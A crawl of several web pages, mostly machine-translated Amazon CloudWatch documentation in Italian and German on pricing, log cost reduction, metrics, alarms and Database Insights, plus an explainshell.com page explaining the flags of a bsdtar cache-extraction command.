lavorando. Ricorda che, sebbene gli allarmi compositi riducano il rumore, generano anche costi aggiuntivi. Quando decidi se creare un allarme standard o un allarme ad alta risoluzione, considera il caso d'uso e il valore che apporta ogni tipo di allarme. Ottimizzazione e riduzione dei costi di Container Insights CloudWatch CloudWatch Container Insights offre funzionalità di osservabilità standard e avanzate per il monitoraggio di applicazioni containerizzate in Amazon ECS e Amazon EKS. CloudWatch Container Insights sfrutta il formato metrico integrato per importare la telemetria dai tuoi ambienti container. Approfondimenti sui container con osservabilità standard: Approfondimenti sui container standard raccoglie e visualizza metriche aggregate a livello di cluster e nodo. Puoi iniziare con la modalità standard di Container Insights utilizzando l' CloudWatch agente o AWS Distro for Open Telemetry (ADOT). L'utilizzo di ADOT consente di personalizzare le metriche e le dimensioni a cui inviare. CloudWatch Le metriche in Approfondimenti sui container vengono trattate come “metriche incorporate”. I costi associati a queste metriche si riflettono nei tipi di utilizzo MetricStorage:AWS/Logs-EMF e DataProcessing-Bytes . Per informazioni dettagliate sui prezzi, consulta la sezione Embedded Metrics CloudWatchsui prezzi di Amazon . Approfondimenti sui container con osservabilità avanzata: Approfondimenti sui container fornisce la visibilità dettagliata tramite l'osservabilità avanzata, che fornisce telemetria granulare fino al livello di pod e container delle applicazioni. Analogamente allo standard di Container Insights, l'osservabilità avanzata include anche un set standard di metriche critiche da cui è possibile iniziare utilizzando il componente aggiuntivo CloudWatch Observability in esecuzione sull'agente. CloudWatch Approfondimenti sui container offre l'osservabilità avanzata con una nuova tariffazione basata sull'osservazione, al fine di garantire fatture convenienti che giustifichino i vantaggi. Per ulteriori informazioni, consulta i CloudWatch prezzi di Amazon . Ecco quanto segue UsageType e le operazioni associate a questo Container Insights con osservabilità migliorata: CloudWatch funzionalità secondaria UsageType Operation Container Insights con osservabilità migliorata per Amazon EKS ObservationUsage ObservationCount:CI-EKScode Approfondimenti sui container con osservabilità avanzata per Amazon ECS MetricsUsage MetricStorage:CI-ECS Ottimizzazione e riduzione dei costi di Database Insights CloudWatch CloudWatch Database Insights offre funzionalità di osservabilità standard e avanzate per il monitoraggio dei database Amazon Aurora sia a livello di istanza che di flotta;. CloudWatch Database Insights consolida i log e le metriche delle applicazioni, dei database e dei sistemi operativi su cui vengono eseguiti in una visualizzazione unificata nella console. Modalità Database Insights Standard: Standard Database Insights fa parte di Piano gratuito di AWS e fornisce una cronologia continua dei dati sulle prestazioni per 7 giorni per la metrica di carico del database. Modalità Database Insights Advanced: Advanced Database Insights consolida i parametri del database, l'analisi delle query SQL e i log per i database Amazon Aurora e RDS in un'esperienza unificata in. CloudWatch I prezzi si basano sulla quantità di risorse di calcolo utilizzate dai database monitorati. Per informazioni dettagliate sui prezzi di Database Insights ed esempi di prezzi, consulta la pagina dei CloudWatchprezzi di Amazon . Ecco le operazioni UsageTypes e le operazioni associate a Database Insights: UsageType Operation Instance Configuration Type Database Engine Type DatabaseInsights-Ore vCPU Aurora-MySQL:Provisioned Provisioned Aurora-MySQL DatabaseInsights-ACU-ore Aurora-MySQL:Serverless Serverless Aurora-MySQL DatabaseInsights-Ore vCPU Aurora-PostgreSQL:Provisioned Provisioned Aurora-PostgreSQL DatabaseInsights-ACU-ore Aurora-PostgreSQL:Serverless Serverless Aurora-PostgreSQL DatabaseInsights-Ore ACU Aurora-PostgreSQL:Limitless Limitless Aurora-PostgreSQL Ottimizzazione e riduzione dei costi dei log CloudWatch Amazon CloudWatch Logs ha i seguenti tipi di log: Registri personalizzati (registri creati per le tue applicazioni) Log venduti ( log che altri Servizi AWS, come Amazon Virtual Private Cloud (Amazon VPC) e Amazon Route 53, creano per tuo conto) Per ulteriori informazioni sui log venduti, consulta Enabling logging from certain AWS services nella Amazon CloudWatch Logs User Guide. I registri personalizzati e venduti generano costi in base al numero di registri che sono raccolti , archiviati , e analizzati . Separatamente, i log venduti generano costi per la consegna ad Amazon S3 e Firehose. La tabella seguente elenca i nomi delle funzionalità di CloudWatch Logs e i nomi delle relative funzionalità secondarie. La tabella include le stringhe per UsageType e Operation , che possono aiutare ad analizzare e identificare i costi relativi ai log. CloudWatch Funzionalità di registro CloudWatch Funzione secondaria per i registri UsageType Operation Scopo Registri personalizzati Raccolta (importazione dei dati per la classe di log Standard) DataProcessing-Bytes PutLogEvents Carica un batch di log in un flusso di log specifico in un gruppo di log di classe Standard. Raccolta (importazione dei dati per la classe di log Infrequent Access) DataProcessingIA-Bytes PutLogEvents Carica un batch di log in un flusso di log specifico in un gruppo di log di classe Infrequent Access. Rilevazione e mascheramento (protezione dei dati ) DataProtection-Bytes PutLogEvents Rileva e maschera i dati protetti negli eventi di log. Archiviazione (archivio ) TimedStorage-ByteHrs HourlyStorageMetering Memorizza i log all'ora e i log per byte in Logs. CloudWatch Analizza (query Logs Insights) DataScanned-Bytes StartQuery Registra i dati scansionati dalle query di Logs Insights CloudWatch Analisi (Logs Live Tail) Logs-LiveTail StartLiveTail Registri analizzati durante una sessione di Logs Live Tail CloudWatch Registri venduti Consegna (classe di CloudWatch log Logs Standard) VendedLog-Bytes PutLogEvents Carica un batch di log in un flusso di log specifico in un gruppo di log della classe di log Standard. Consegna (classe di CloudWatch registro Logs Infrequent Access) VendedLogIA-Bytes PutLogEvents Carica un batch di log in un flusso di log specifico in un gruppo di log della classe di log Infrequent Access. Consegna (Amazon S3) S3-Egress-Bytes LogDelivery Carica un batch di log venduti in un bucket S3 specifico Consegna (Amazon S3) in formato Parquet S3-Egress-InputBytes ParquetConversion Esegue la conversione in Parquet sui log consegnati ad Amazon S3 Consegna (Firehose) FH-Egress-Bytes LogDelivery Carica un batch di log venduti in Amazon Data Firehose Per analizzare i costi, usa AWS Cost Explorer Service or AWS Cost and Usage Report s con Athena. Con entrambi i metodi, è possibile identificare quali log generano costi e determinare come vengono generati i costi. Usando AWS Cost Explorer Service Seleziona CloudWatch il filtro Service e seleziona Resource for the Dimension . Quando si seleziona Risorsa come dimensione nel servizio Cost Explorer, è possibile visualizzare solo gli ultimi 14 giorni di utilizzo. Utilizzo della Amazon Athena query per tenere traccia dei log che generano costi È possibile utilizzare la seguente query per tenere traccia dei log che generano costi in base all'ID della risorsa. SELECT line_item_resource_id AS ResourceID, line_item_usage_type AS Operation, SUM(CAST(line_item_unblended_cost AS decimal(16,8))) AS TotalSpend FROM costandusagereport WHERE product_product_name = 'AmazonCloudWatch' AND year=' 2025 ' AND month=' 4 ' AND line_item_operation IN ('PutLogEvents','HourlyStorageMetering','StartQuery','LogDelivery','StartLiveTail','ParquetConversion') AND line_item_line_item_type NOT IN ('Tax','Credit','Refund','EdpDiscount','Fee','RIFee') GROUP BY line_item_resource_id, line_item_usage_type ORDER BY TotalSpend DESC Per sfruttare al meglio i costi generati dai CloudWatch registri, considera quanto segue: Identifica i principali gruppi di log in base alla spesa per operazione utilizzando la query precedente. Registra solo gli eventi che apportano valore alla tua attività e scegli una sintassi di log efficiente. Una sintassi di log dettagliata incrementa il volume e quindi i costi. In questo modo è possibile ridurre i costi per l'importazione. Modifica le impostazioni di conservazione dei log, in modo da generare costi inferiori per l'archiviazione. Per ulteriori informazioni, consulta Change log data retention in CloudWatch Logs nella Amazon CloudWatch Logs User Guide. Valuta la possibilità di utilizzare la classe di log Infrequent Access, laddove appropriato. I log Infrequent Access offrono meno funzionalità rispetto alla classe Standard. Determina se hai bisogno delle funzionalità aggiuntive della classe di log Standard e comprendi la differenza tra le due classi. Per ulteriori informazioni, consulta l'articolo del blog New CloudWatch Logs log class for infrequent access logs a prezzo ridotto. Sebbene la classe Infrequent Access supporti un numero inferiore di funzionalità, è adatta per la maggior parte dei casi d'uso. Esegui le query che CloudWatch Logs Insights salva automaticamente nella tua cronologia. In questo modo, si generano meno costi per l'analisi. Per ulteriori informazioni, consulta Visualizza le query in esecuzione o la cronologia delle query nella Amazon CloudWatch Logs User Guide. Usa l' CloudWatch agente per raccogliere i log di sistema e delle applicazioni e inviarli a. CloudWatch In questo modo, puoi raccogliere solo i log eventi che soddisfano i tuoi criteri. Per ulteriori informazioni, consulta Amazon CloudWatch Agent adds Support for Log Filter Expressions . Per ridurre i costi dei log venduti, considera il tuo caso d'uso e poi determina se i log devono essere inviati ad Amazon S3 o ad Amazon CloudWatch S3. Per ulteriori informazioni, consulta Logs sent to Amazon S3 nella CloudWatch Amazon Logs User Guide. Suggerimento Se desideri utilizzare filtri metrici, filtri di abbonamento, CloudWatch Logs Insights e Contributor Insights, invia i log venduti a. CloudWatch In alternativa, se lavori con i registri di flusso VPC e li utilizzi per scopi di verifica e conformità, invia i registri venduti ad Amazon S3. Per informazioni su come tenere traccia degli addebiti generati dalla pubblicazione dei log di flusso VPC nei bucket S3, consulta Usare s e i tag di allocazione dei costi per comprendere l'ingestione dei dati di VPC AWS Cost and Usage Report FLow Logs in Amazon S3. Per ulteriori informazioni su come sfruttare al meglio i costi generati dai CloudWatch log, consulta Quale gruppo di log causa un aumento improvviso della mia fattura relativa ai log ? CloudWatch . JavaScript è disabilitato o non è disponibile nel tuo browser. Per usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Configurazione delle impostazioni Pannelli di controllo Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/working_with_metrics.html | Metriche in Amazon CloudWatch - Amazon CloudWatch Metriche in Amazon CloudWatch - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. Metriche in Amazon CloudWatch I parametri sono dati riguardanti le prestazioni dei sistemi. Per impostazione predefinita, molti servizi forniscono parametri gratuiti per le risorse (come EC2 istanze Amazon, volumi Amazon EBS e istanze DB Amazon RDS). Puoi anche abilitare il monitoraggio dettagliato di alcune risorse, come le EC2 istanze Amazon, o pubblicare i parametri delle tue applicazioni. Amazon CloudWatch può caricare tutte le metriche del tuo account (sia le metriche AWS delle risorse che le metriche delle applicazioni fornite) per la ricerca, la creazione di grafici e gli allarmi. I dati metrici vengono conservati per 15 mesi, consentendoti di visualizzare sia i dati che i dati storici. up-to-the-minute Per rappresentare graficamente le metriche nella console, puoi utilizzare CloudWatch Metrics Insights, un motore di query SQL ad alte prestazioni che puoi utilizzare per identificare tendenze e modelli all'interno di tutte le tue metriche in tempo reale. CloudWatch Metrics Insights supporta l'interrogazione di dati storici fino a due settimane, consentendo un'analisi completa delle tendenze delle metriche. Argomenti Concetti relativi alle metriche Monitoraggio di base e monitoraggio dettagliato in CloudWatch Interroga le tue CloudWatch metriche con Metrics Insights CloudWatch Usa metrics explorer per monitorare le risorse in base ai tag e alle proprietà Utilizzo dei flussi di parametri Visualizzazione di parametri disponibili Rappresentazione grafica dei parametri Utilizzo del rilevamento CloudWatch dei valori anomali Utilizzo di espressioni matematiche con metriche CloudWatch Utilizzo delle espressioni di ricerca nei grafici Ottenere le statistiche di un parametro Publish custom metrics JavaScript è disabilitato o non è disponibile nel tuo browser. Per usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Modifica dell'intervallo di tempo o del formato del fuso orario Concetti Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/Lambda-Insights.html | Lambda-Einblicke - Amazon CloudWatch Lambda-Einblicke - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Lambda-Einblicke CloudWatch Lambda Insights ist eine Überwachungs- und Fehlerbehebungslösung für serverlose Anwendungen, die auf ausgeführt werden. AWS Lambda Die Lösung erfasst, aggregiert und fasst Metriken auf Systemebene zusammen, einschließlich CPU-Zeit, Arbeitsspeicher, Datenträger und Netzwerk. Sie erfasst, aggregiert und fasst Diagnoseinformationen wie Kaltstart und Lambda-Worker-Abschaltungen zusammen, um Probleme mit Ihren Lambda-Funktionen zu isolieren und schnell zu beheben. Lambda Insights verwendet eine neue CloudWatch Lambda-Erweiterung, die als Lambda-Schicht bereitgestellt wird. Wenn Sie diese Erweiterung auf einer Lambda-Funktion installieren, sammelt sie Metriken auf Systemebene und gibt für jeden Aufruf dieser Lambda-Funktion ein einziges Leistungsprotokollereignis aus. CloudWatch verwendet eine eingebettete Metrikformatierung, um Metriken aus den Protokollereignissen zu extrahieren. Anmerkung Der Lambda-Insights-Agent wird nur bei Lambda-Laufzeiten unterstützt, die Amazon Linux 2 und Amazon Linux 2023 verwenden. Weitere Informationen zu Lambda-Erweiterungen finden Sie unter AWS Lambda Erweiterungen verwenden . Weitere Hinweise zum eingebetteten Metrik-Format finden Sie unter Einbetten von Metriken in Protokollen . Sie können Lambda Insights mit jeder Lambda-Funktion verwenden, die eine Lambda-Laufzeit verwendet, die Lambda-Erweiterungen unterstützt. Eine Liste dieser Laufzeiten finden Sie unter Lambda-Erweiterungen-API . Preise Für jede für Lambda Insights aktivierte Lambda-Funktion zahlen Sie nur für das, was Sie für Metriken und Protokolle tatsächlich nutzen. Ein Preisbeispiel finden Sie unter Amazon CloudWatch Pricing . Die von der Lambda-Erweiterung verbrauchte Ausführungszeit wird Ihnen in Schritten von je 1 ms in Rechnung gestellt. Weitere Informationen zu den Preisen für Lambda finden Sie unter AWS Lambda -Preise . JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Bereitstellung anderer CloudWatch Agentenfunktionen in Ihren Containern Erste Schritte mit Lambda Insights Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://explainshell.com/explain?cmd=bsdtar.1%20-xf%20/home/runner/work/_temp/90d7ca9c-2ee4-4224-bacc-78ba41147d5f/cache.tzst%20-P%20-C%20/home/runner/work/Cacheract/Cacheract%20--use-compress-program%20unzstd | explainshell.com - bsdtar.1 -xf /home/runner/work/_temp/90d7ca9c-2ee4-4224-bacc-78ba41147d5f/cache.tzst -P -C /home/runner/work/Cacheract/Cacheract --use-compress-program unzstd explain shell . com about theme Light Dark --> bsdtar.1 other manpages tar(1) -x f /home/runner/work/_temp/90d7ca9c-2ee4-4224-bacc-78ba41147d5f/cache.tzst -P -C /home/runner/work/Cacheract/Cacheract --use-compress-program unzstd manipulate tape archives -f file , --file file Read the archive from or write the archive to the specified file. The filename can be - for standard input or standard output. The default varies by system; on FreeBSD, the default is /dev/sa0 ; on Linux, the default is /dev/st0 . -P , --absolute-paths Preserve pathnames. By default, absolute pathnames (those that begin with a / character) have the leading slash removed both when creating archives and extracting from them. Also, tar will refuse to extract archive entries whose pathnames contain .. or whose target directory would be altered by a symlink. This option suppresses these behaviors. -C directory , --cd directory , --directory directory In c and r mode, this changes the directory before adding the following files. In x mode, change directories after opening the archive but before extracting entries from the archive. --use-compress-program program Pipe the input (in x or t mode) or the output (in c mode) through program instead of using the builtin compression support. source manpages: bsdtar | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/Acting_Alarm_Changes.html | Operazioni sulle modifiche degli allarmi - Amazon CloudWatch Operazioni sulle modifiche degli allarmi - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Operazioni degli allarmi e notifiche Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. Operazioni sulle modifiche degli allarmi CloudWatch può notificare agli utenti due tipi di modifiche agli allarmi: quando un allarme cambia stato e quando la configurazione di un allarme viene aggiornata. Quando un allarme viene valutato, può cambiare da uno stato all'altro, ad esempio ALARM oppure OK. Per gli allarmi di Approfondimenti sulle metriche che monitorano più serie temporali, ogni serie temporale (collaboratore) può essere solo nello stato ALARM o OK, mai nello stato INSUFFICIENT_DATA. Questo perché una serie temporale esiste solo quando sono presenti dati. Operazioni degli allarmi e notifiche La tabella seguente mostra quali operazioni vengono eseguite a livello di allarme rispetto a quelle a livello di collaboratore per gli allarmi di Approfondimenti sulle metriche: Tipo di operazione Livello di allarme Livello di collaboratore Ulteriori informazioni Notifiche SNS Sì Sì Destinazioni per eventi Amazon SNS EC2 azioni (arresto, interruzione, riavvio, ripristino) No Sì Crea allarmi per interrompere, terminare, riavviare o ripristinare un'istanza EC2 Operazioni Auto Scaling Sì No Politiche di scalabilità semplici e dettagliate per Amazon EC2 Auto Scaling OpsItem Creazione di Systems Manager Sì Sì Configura CloudWatch gli allarmi da creare OpsItems Strumento di gestione degli incidenti Systems Manager Sì No Creazione automatica di incidenti con allarmi CloudWatch Invocazione della funzione Lambda Sì Sì Invocazione di una funzione Lambda da un allarme CloudWatch indagini, indagini Sì No Avvia un'indagine a partire da un allarme CloudWatch Il contenuto delle notifiche di allarme differisce tra allarmi a metrica singola e allarmi con più serie temporali: Gli allarmi a metrica singola includono sia un motivo dello stato che dati dettagliati sul motivo dello stato, mostrando i punti dati specifici che hanno causato il cambiamento di stato. Gli allarmi a più serie temporali forniscono un motivo di stato semplificato per ogni collaboratore, senza il blocco di dati dettagliato del motivo dello stato. Esempio Esempi di contenuto delle notifiche La notifica di allarme a metrica singola include dati dettagliati: { "stateReason": "Threshold Crossed: 3 out of the last 3 datapoints [32.6 (03/07/25 08:29:00), 33.8 (03/07/25 08:24:00), 41.0 (03/07/25 08:19:00)] were greater than the threshold (31.0)...", "stateReasonData": { "version": "1.0", "queryDate": "2025-07-03T08:34:06.300+0000", "startDate": "2025-07-03T08:19:00.000+0000", "statistic": "Average", "period": 300, "recentDatapoints": [41, 33.8, 32.6], "threshold": 31, "evaluatedDatapoints": [ { "timestamp": "2025-07-03T08:29:00.000+0000", "sampleCount": 5, "value": 32.6 } // Additional datapoints... ] } } La notifica di allarme con più serie temporali include un motivo semplificato: { "stateReason": "Threshold Crossed: 3 datapoints were greater than the threshold (0.0). The most recent datapoints which crossed the threshold: [32.6 (03/07/25 08:29:00)]." } Inoltre, CloudWatch invia eventi ad Amazon EventBridge ogni volta che gli allarmi cambiano di stato e quando gli allarmi vengono creati, eliminati o aggiornati. Puoi scrivere EventBridge regole per intraprendere azioni o ricevere notifiche quando ricevi questi EventBridge eventi. Argomenti Notifica agli utenti delle modifiche agli allarmi Invocazione di una funzione Lambda da un allarme Avvia un'indagine a partire da un allarme CloudWatch Eventi di allarme e EventBridge JavaScript è disabilitato o non è disponibile nel tuo browser. Per usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Soppressione delle operazioni degli allarmi compositi Notifica agli utenti delle modifiche agli allarmi Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/GettingStarted.html | Nozioni di base sui pannelli di controllo automatici di CloudWatch - Amazon CloudWatch Nozioni di base sui pannelli di controllo automatici di CloudWatch - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. Nozioni di base sui pannelli di controllo automatici di CloudWatch La home page di CloudWatch visualizza automaticamente i parametri relativi a ogni servizio AWS utilizzato. Puoi inoltre creare pannelli di controllo personalizzati per visualizzare i parametri relativi alle applicazioni personalizzate e visualizzare raccolte personalizzate dei parametri scelti. Apri la console CloudWatch all'indirizzo https://console.aws.amazon.com/cloudwatch/ . Viene visualizzata la home page della panoramica di CloudWatch. La panoramica contiene i seguenti elementi, aggiornati automaticamente. Allarmi per servizio AWS mostra un elenco dei servizi AWS che usi nel tuo account, insieme allo stato degli allarmi in tali servizi. Accanto a queste informazioni, vengono visualizzati due o quattro allarmi nel tuo account. Il numero dipende dal numero di servizi AWS che utilizzi. Gli allarmi mostrati sono quelli nello stato ALARM o quelli il cui stato è stato modificato di recente. Queste aree superiori consentono di valutare rapidamente l'integrità dei servizi AWS visualizzando gli stati di allarme in ogni servizio e gli allarmi il cui stato è cambiato di recente. Questo consente di monitorare e diagnosticare rapidamente i problemi. Sotto queste aree è disponibile il pannello di controllo predefinito , se esistente. Il pannello di controllo predefinito è un pannello di controllo personalizzato creato e denominato CloudWatch-Default . Si tratta di un modo conveniente per aggiungere parametri relativi a servizi o applicazioni personalizzate alla pagina di panoramica o per presentare parametri chiave aggiuntivi da servizi AWS che desideri monitorare. Nota I pannelli di controllo automatici sulla home page di CloudWatch visualizzano solo le informazioni dell'account corrente, anche se si tratta di un account di monitoraggio configurato per l'osservabilità tra account di CloudWatch. Per ulteriori informazioni sulla creazione di pannelli di controllo tra account, consulta la sezione Creazione di una dashboard CloudWatch interregionale con più account con Console di gestione AWS . Da questa panoramica, puoi visualizzare un pannello di controllo di tutti i servizi con metriche relative a più servizi AWS oppure concentrare la visualizzazione su un gruppo di risorse o un servizio AWS specifico. Questo consente di limitare la visualizzazione a un sottoinsieme di risorse di interesse. Argomenti Visualizzazione del pannello di controllo di tutti i servizi di CloudWatch Rimozione della visualizzazione di un servizio nel pannello di controllo di tutti i servizi di CloudWatch Visualizzazione di un pannello di controllo CloudWatch per un singolo servizio AWS Visualizzazione di un pannello di controllo di CloudWatch per un gruppo di risorse JavaScript è disabilitato o non è disponibile nel tuo browser. Per usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Pannelli di controllo Visualizzazione del pannello di controllo di tutti i servizi Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/Database-Insights.html | CloudWatch Informazioni approfondite sul database - Amazon CloudWatch CloudWatch Informazioni approfondite sul database - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Modalità Conservazione dei dati Approfondimenti sulle prestazioni Prezzi Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. CloudWatch Informazioni approfondite sul database Usa CloudWatch Database Insights per monitorare e risolvere i problemi di Amazon Aurora MySQL, Amazon Aurora PostgreSQL, Amazon Aurora PostgreSQL Limitless, Amazon RDS per SQL Server, RDS per MySQL, RDS per MySQL, RDS per PostgreSQL, RDS per Oracle e Database RDS per MariadB su larga scala. Con Database Insights, puoi monitorare il tuo parco di database con pannelli di controllo preconfigurati e prescrittivi. Per aiutarti ad analizzare le prestazioni del tuo parco, i pannelli di controllo Database Insights, che possono essere personalizzati, mostrano metriche e visualizzazioni curate. Presentando le metriche in un unico pannello di controllo per tutti i database del parco, Database Insights consente di monitorare contemporaneamente i vari database. Ad esempio, puoi utilizzare Database Insights per trovare un database con prestazioni scadenti all'interno di un parco di centinaia di istanze di database. Dopodiché, puoi selezionare quell'istanza e utilizzare Database Insights per risolvere i problemi. Per informazioni sul supporto del motore e della classe di istanza Regione AWS, consulta il supporto del motore Aurora DB, della regione e della classe di istanza per Database Insights e il supporto del motore, della regione e della classe di istanza di Amazon RDS DB per Database Insights. Database Insights supporta il monitoraggio dei carichi di lavoro su più account e regioni. Per ulteriori informazioni sulla funzionalità di monitoraggio interregionale tra account di Database Insights, consulta Configurare il monitoraggio interregionale tra account per Database Insights CloudWatch Per le nozioni di base su Database Insights, consulta gli argomenti seguenti. Argomenti Inizia a usare CloudWatch Database Insights Visualizzazione del pannello di controllo dell'integrità del parco per CloudWatch Database Insights Visualizzazione del dashboard delle istanze di CloudWatch database per Database Insights Risoluzione dei problemi per CloudWatch Database Insights Modalità di Database Insights Database Insights ha una modalità avanzata e una modalità standard. La modalità standard è l'impostazione predefinita per Database Insights, ma è anche possibile attivare la modalità avanzata per il database. La tabella seguente mostra le funzionalità CloudWatch supportate per la modalità Avanzata e la modalità Standard di Database Insights. Funzionalità Modalità Standard Modalità avanzata Analisi dei collaboratori principali del carico del database per dimensione Supportata Supportata Esecuzione di query, creazione di grafici e impostazione di allarmi sulle metriche del database con un massimo di 7 giorni di conservazione Supportata Supportata Definizione di policy di controllo degli accessi granulari per limitare l'accesso a dimensioni potenzialmente sensibili come il testo SQL Supportata Supportata Analisi dei processi del sistema operativo che avvengono nei database con metriche dettagliate per ciascun processo in esecuzione Per il funzionamento di questa funzionalità è richiesto Monitoraggio avanzato Amazon RDS . Non supportata Supportata Definisci e salva visualizzazioni di monitoraggio a livello di flotta per valutare lo stato del database su larga scala Non supportata Supportata Analisi dei blocchi SQL con 15 mesi di conservazione e una UX guidata Non supportata Supportato solo per Aurora PostgreSQL Analisi dei piani di esecuzione SQL con 15 mesi di conservazione e una UX guidata Non supportata Supportato solo per Aurora PostgreSQL, RDS per Oracle e RDS per SQL Server Visualizzazione delle statistiche per query Non supportata Supportata Analisi delle query SQL lente L'esportazione dei log del database in CloudWatch Logs è necessaria per il funzionamento di questa funzionalità. Non supportata Supportata Visualizza i servizi di chiamata con Application Signals CloudWatch Non supportata Supportata Visualizzazione di un pannello di controllo consolidato per tutta la telemetria del database, inclusi metriche, log, eventi e applicazioni L'esportazione dei log del database in CloudWatch Logs è necessaria per visualizzare i log del database nella console Database Insights. Non supportata Supportata Importa automaticamente le metriche dei contatori di Performance Insights CloudWatch Non supportata Supportata Visualizza gli eventi Amazon RDS in CloudWatch Non supportata Supportata Analisi delle prestazioni del database per un periodo di tempo a scelta con l'analisi on demand Non supportata Supportato solo per Aurora PostgreSQL, Aurora MySQL, RDS per PostgreSQL, RDS per MySQL, RDS per MariaDB e RDS per Oracle Nota La disponibilità delle funzionalità di Database Insights varia nelle diverse AWS regioni, poiché non tutte le funzionalità della modalità avanzata sono disponibili in tutte le regioni. Conservazione dei dati La modalità avanzata di Database Insights conserva le metriche raccolte da Approfondimenti sulle prestazioni per un periodo di 15 mesi. Se Approfondimenti sulle prestazioni è abilitato in modalità standard, Amazon RDS conserva i contatori di Approfondimenti sulle prestazioni per un periodo 7 giorni. Per ulteriori informazioni sulle metriche dei contatori per Approfondimenti sulle prestazioni, consulta Performance Insights counter metrics . Per informazioni sul periodo di conservazione delle CloudWatch metriche raccolte da Database Insights, consulta i seguenti argomenti. CloudWatch Parametri Amazon per Amazon Aurora nella Guida per l'utente di Amazon Aurora CloudWatch Parametri Amazon per Amazon Relational Database Service nella Guida per l'utente di Amazon RDS CloudWatch Metriche di Amazon RDS Performance Insights nella Guida per l'utente di Amazon Aurora CloudWatch Metriche di Amazon RDS Performance Insights nella Guida per l'utente di Amazon Aurora In che modo Database Insights si integra con Approfondimenti sulle prestazioni Approfondimenti sulle prestazioni è un servizio di monitoraggio delle prestazioni del database. Database Insights sviluppa ed estende le funzionalità di Approfondimenti sulle prestazioni. Database Insights aggiunge funzionalità di monitoraggio, analisi e ottimizzazione. Per abilitare la modalità avanzata di Database Insights, è necessario abilitare Approfondimenti sulle prestazioni. Database Insights importa CloudWatch automaticamente le metriche dei contatori di Performance Insights. La modalità Advanced di Database Insights conserva automaticamente per 15 mesi tutte le metriche raccolte da Database Insights, incluse le metriche e le metriche di Performance Insights. CloudWatch Ciò avviene automaticamente quando si abilita la modalità avanzata in un'istanza, senza bisogno di ulteriori configurazioni. Per ulteriori informazioni sulle metriche dei contatori di Approfondimenti sulle prestazioni, consulta Performance Insights counter metrics nella Guida per l'utente di Amazon Aurora . Prezzi Per informazioni sui prezzi, consulta la pagina CloudWatch dei prezzi di Amazon . JavaScript è disabilitato o non è disponibile nel tuo browser. Per 